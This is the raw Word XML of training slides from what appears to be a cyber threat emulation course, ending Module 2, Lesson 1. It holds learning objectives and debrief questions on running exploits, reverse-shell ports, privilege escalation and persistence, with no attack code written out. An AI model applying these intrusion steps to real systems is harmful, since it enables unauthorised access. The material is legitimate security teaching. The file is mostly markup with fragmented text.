    <w:p w14:paraId="284722AD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="400" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>After completing this ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>ercise, students will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0A1D3D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Interpret exploit code and Metasploit modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B10978F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="935" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="5478BF55" wp14:editId="37510196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28975" cy="5600700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340856" name="Picture 340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56" name="Picture 340856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Execute exploit on target machine with Python • Perform privilege escalation on target with Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06932018" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>Duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542F5B6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="415" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This exercise will take approximately 3 hours to complete, with 30-45 minutes to review answers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D91B6A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="289"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Debrief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FD7240" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="415" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>General Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7114B253" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="39B6ABF0" wp14:editId="2FEEE4DD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93081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="295648" name="Picture 295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48" name="Picture 295648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93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How did you feel about t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>his procedure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A1961" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="213" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Were there any areas in particular where you had difficulty?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C8890" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Do you understand how this relates to the work you will be doing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8FCC7B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="296"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Debrief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A49886" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="415" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>Specific Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C20AD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r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0" wp14:anchorId="7ACEC17B" wp14:editId="68E18BA9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93081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="296899" name="Picture 296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99" name="Picture 296899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93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>What location on the file system did you place your PI-IP code? Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FE5813" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>What port did you choose for your reverse shell? Are they any ports that you would not be able to use?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4885B8D4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Once you have access to the machine, what other damage could you do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D107462" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="296"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Debrief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4DA580" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="415" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>Specifi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>c Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2E76F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="28" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r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0" wp14:anchorId="2FB7B587" wp14:editId="35BBBB6F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93081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="298028" name="Picture 298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28" name="Picture 298028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93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>How else can you abuse the Python script to escalate your privileges?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02054F31" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>We did not work to establish persistence. What are potential options we could explore to set up persistence?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBB151" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="157"/>
        <w:ind w:left="430"/>
      </w:pPr>
      <w:r>
        <w:t>Lesson Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E31D7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="198" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="415" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>In this lesson we have discussed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791AE589" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="66" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>ExploitDB intro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>duction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4B035" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="60"/>
        <w:ind w:hanging="552"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B48A969" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="308" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Python reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D97F7E9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="1268" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation, callback &amp; privilege escalation exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0E8C85" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15612" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E125E6C" wp14:editId="21BD51EB">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="298313" name="Picture 298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13" name="Picture 29831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B34B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1080" w:right="13506"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16908" w:type="dxa"/>
        <w:tblInd w:w="140" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="40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16908"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="1B6A6611" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2544"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="169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CB80A27" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0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5824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76FC616F" wp14:editId="4B32E0F3">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>3911918</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>0</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6789420" cy="563880"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="341225" name="Group 3412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789420" cy="563880"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="6789420" cy="5638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3948" name="Picture 303948"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId20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587240" y="0"/>
                                  <a:ext cx="2202180" cy="541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0858" name="Picture 340858"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId20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9721" cy="548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3907" name="Picture 303907"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId2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30780" y="541020"/>
                                  <a:ext cx="1455420" cy="22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41225" style="width:534.6pt;height:44.4pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:308.025pt;mso-position-vertical-relative:text;margin-top:0pt;" coordsize="67894,5638">
                      <v:shape id="Picture 303948" style="position:absolute;width:22021;height:5410;left:45872;top:0;" filled="f">
                        <v:imagedata r:id="rId211"/>
                      </v:shape>
                      <v:shape id="Picture 340858" style="position:absolute;width:15697;height:5486;left:0;top:0;" filled="f">
                        <v:imagedata r:id="rId212"/>
                      </v:shape>
                      <v:shape id="Picture 303907" style="position:absolute;width:14554;height:228;left:24307;top:5410;" filled="f">
                        <v:imagedata r:id="rId213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9ECAD67" wp14:editId="07C5548A">
                  <wp:extent cx="2263140" cy="1554480"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340860" name="Picture 3408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860" name="Picture 340860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88"/>
              </w:rPr>
              <w:t>End of Module 2, Lesson 1 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3848D905" wp14:editId="5DBA7912">
                  <wp:extent cx="2202180" cy="426720"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="303934" name="Picture 3039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934" name="Picture 303934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180" cy="4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5C382BA" wp14:editId="487AF595">
                  <wp:extent cx="2202180" cy="586740"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="303962" name="Picture 3039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962" name="Picture 303962"/>
                          <pic:cNvPicPr/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180" cy="58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DA633B" w14:textId="77777777" w:rsidR="006F6D33" w:rsidRDefault="006F6D33"/>
    <w:sectPr w:rsidR="006F6D33">
      <w:headerReference w:type="even" r:id="rId217"/>
      <w:headerReference w:type="default" r:id="rId218"/>
      <w:footerReference w:type="even" r:id="rId219"/>
      <w:footerReference w:type="default" r:id="rId220"/>
      <w:headerReference w:type="first" r:id="rId221"/>
      <w:footerReference w:type="first" r:id="rId222"/>
      <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
      <w:pgMar w:top="1314" w:right="870" w:bottom="180" w:left="1080" w:header="156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4E4518" w14:textId="77777777" w:rsidR="006F6D33" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="245685B3" w14:textId="77777777" w:rsidR="006F6D33" w:rsidRDefault="006F6D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00063C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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C96868" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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00F86F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1464" w:right="17760"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="32DCA54A" wp14:editId="55BDE551">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>10599420</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>5699760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1363980" cy="1036320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11" name="Picture 29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63980" cy="1036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5F0926" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1464" w:right="1776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711341AB" wp14:editId="0ACB36E2">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>10599420</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>5699760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1363980" cy="1036320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11" name="Picture 29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63980" cy="1036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CF83E3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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A3B867" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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7A448B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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8F3DA3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
      <w:ind w:left="255" w:right="14640" w:firstLine="495"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="34"/>
      </w:rPr>
      <w:t>end end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AB60D3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
      <w:ind w:left="255" w:right="14640" w:firstLine="495"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="34"/>
      </w:rPr>
      <w:t>end end</w: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13100D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
      <w:ind w:left="255" w:right="14640" w:firstLine="495"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="34"/>
      </w:rPr>
      <w:t>end end</w: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391923" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="3720"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t>include?( '35e' )</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="11860B51" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="4095"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="54"/>
      </w:rPr>
      <w:t xml:space="preserve">: </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t>Unknown,</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="5E6CCD5C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="750"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="34"/>
      </w:rPr>
      <w:t>end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35E32D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1485" w:right="17604"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="26240957" wp14:editId="4F870E38">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>10599420</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>5699760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1363980" cy="1036320"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>
          <wp:docPr id="2911" name="Picture 29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11" name="Picture 29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63980" cy="1036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31E2B5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="3720"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t>include?( '35e' )</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="5ED329FF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="4095"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="54"/>
      </w:rPr>
      <w:t xml:space="preserve">: </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t>Unknown,</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="65FEF938" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="750"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="34"/>
      </w:rPr>
      <w:t>end</w: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E8F4C1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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7E2DF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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C12BB8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/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73A513" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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827855" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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AEADD4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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0D1F69" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1224" w:right="17025"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="0B395C5A" wp14:editId="3298B2A7">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>10599420</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>5699760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1363980" cy="103632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11" name="Picture 29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63980" cy="1036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7905E8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1224" w:right="17025"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="270A6EDC" wp14:editId="564BBE9E">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>10599420</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>5699760</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1363980" cy="103632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11" name="Picture 29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63980" cy="1036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B508FD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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BF7216" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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096677" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0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227573" w14:textId="77777777" w:rsidR="006F6D33" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03C534F1" w14:textId="77777777" w:rsidR="006F6D33" w:rsidRDefault="006F6D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2300F0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1101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51538C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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7DA303" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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2EF8E9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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009906" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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CD7AE1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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9F26C0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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714280" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
    <w:pPr>
      <w:spacing w:after="0" w:line="707" w:lineRule="auto"/>
      <w:ind w:left="90" w:right="12105" w:hanging="1140"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="48"/>
      </w:rPr>
      <w:t xml:space="preserve">CTE </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="50"/>
      </w:rPr>
      <w:t xml:space="preserve">I </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="42"/>
      </w:rPr>
      <w:t xml:space="preserve">Cyber </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="40"/>
      </w:rPr>
      <w:t xml:space="preserve">Threat Emulation </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="36"/>
      </w:rPr>
